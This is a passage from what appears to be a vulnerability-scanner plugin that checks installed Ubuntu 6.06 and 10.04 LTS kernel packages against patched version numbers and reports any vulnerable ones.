rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crc-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext2-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext3-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"jfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"loop-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-firmware-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ntfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"reiserfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ufs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-310-ec2\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-310-ec2\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26-386\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26-generic-pae\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26-generic\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-386\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-generic-pae\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-generic\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-virtual\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.32-26\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.32\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-310\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.32\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 